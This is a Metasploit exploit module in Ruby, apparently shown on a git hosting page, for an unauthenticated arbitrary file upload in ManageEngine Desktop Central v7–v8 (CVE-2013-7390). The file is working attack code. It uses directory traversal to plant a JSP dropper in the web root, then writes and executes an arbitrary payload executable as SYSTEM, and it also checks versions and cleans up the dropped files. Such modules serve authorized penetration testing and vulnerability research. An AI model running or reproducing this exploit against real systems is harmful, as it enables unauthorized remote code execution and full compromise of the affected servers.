adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
0ae2e64bc56dd8543a97cc4ebc94de4738376488
metasploit-gs/modules/exploits/windows/http/desktopcentral_file_upload.rb
T
wchen-r7 4f903a604c Fix #5103, Revert unwanted URI encoding 
Fix #5103. By default, Httpclient will encode the URI but
we don't necessarily want that. These modules originally
didn't use URI encoding when they were written so we should
just keep them that way.
2015-04-17 13:59:49 -05:00

180 lines
5.4 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability in Desktop Central v7 to
v8 build 80293. A malicious user can upload a JSP file into the web root without
authentication, leading to arbitrary code execution as SYSTEM.
},
'Author' =>
[
'Thomas Hibbert <thomas.hibbert[at]security-assessment.com>' # Vulnerability discovery and MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-7390'],
['OSVDB', '100008'],
['URL', 'http://security-assessment.com/files/documents/advisory/Desktop%20Central%20Arbitrary%20File%20Upload.pdf'],
['URL', 'http://seclists.org/fulldisclosure/2013/Nov/130'],
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Desktop Central v7 - v8 build 80292 / Windows', {} ]
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 11 2013'
))
register_options([Opt::RPORT(8020)], self.class)
end
def upload_file(filename, contents)
res = send_request_cgi({
'uri' => normalize_uri('agentLogUploader'),
'method' => 'POST',
'data' => contents,
'ctype' => 'text/html',
'encode_params' => false,
'vars_get' => {
'computerName' => 'DesktopCentral',
'domainName' => 'webapps',
'customerId' => '..',
'filename' => filename
}
})
if res && res.code == 200 && res.body.to_s.empty?
return true
else
return false
end
end
# Test for Desktop Central
def check
res = send_request_cgi({
'uri' => normalize_uri("configurations.do"),
'method' => 'GET'
})
if res && res.code == 200
build = nil
if res.body.to_s =~ /ManageEngine Desktop Central 7/ ||
res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7
print_status("#{peer} - Detected Desktop Central v7")
elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ ||
res.body.to_s =~ /ManageEngine Desktop Central MSP 8/
if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions)
build = $1
print_status("#{peer} - Detected Desktop Central v8 #{build}")
else # DC v8 (earlier versions)
print_status("#{peer} - Detected Desktop Central v8")
end
elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?)
build = $1
end
if build.nil?
return Exploit::CheckCode::Unknown
elsif Gem::Version.new(build) < Gem::Version.new("80293")
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Uploading JSP to execute the payload")
exe = payload.encoded_exe
exe_filename = rand_text_alpha_lower(8) + ".exe"
dropper = jsp_drop_and_execute(exe, exe_filename)
dropper_filename = rand_text_alpha_lower(8) + ".jsp"
if upload_file(dropper_filename, dropper)
register_files_for_cleanup(exe_filename)
register_files_for_cleanup("..\\webapps\\DesktopCentral\\#{dropper_filename}")
else
fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
end
print_status("#{peer} - Executing payload")
send_request_cgi(
{
'uri' => normalize_uri(dropper_filename),
'method' => 'GET'
})
end
def jsp_drop_bin(bin_data, output_file)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
jspraw << %Q|int numbytes = data.length();\n|
jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
jspraw << %Q|{\n|
jspraw << %Q| char char1 = (char) data.charAt(counter);\n|
jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|
jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|
jspraw << %Q| comb <<= 4;\n|
jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|
jspraw << %Q| bytes[counter/2] = (byte)comb;\n|
jspraw << %Q|}\n|
jspraw << %Q|outputstream.write(bytes);\n|
jspraw << %Q|outputstream.close();\n|
jspraw << %Q|%>\n|
jspraw
end
def jsp_execute_command(command)
jspraw = %Q|\n|
jspraw << %Q|<%\n|
jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
jspraw << %Q|%>\n|
jspraw
end
def jsp_drop_and_execute(bin_data, output_file)
jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)
end
end
Reference in New Issue View Git Blame Copy Permalink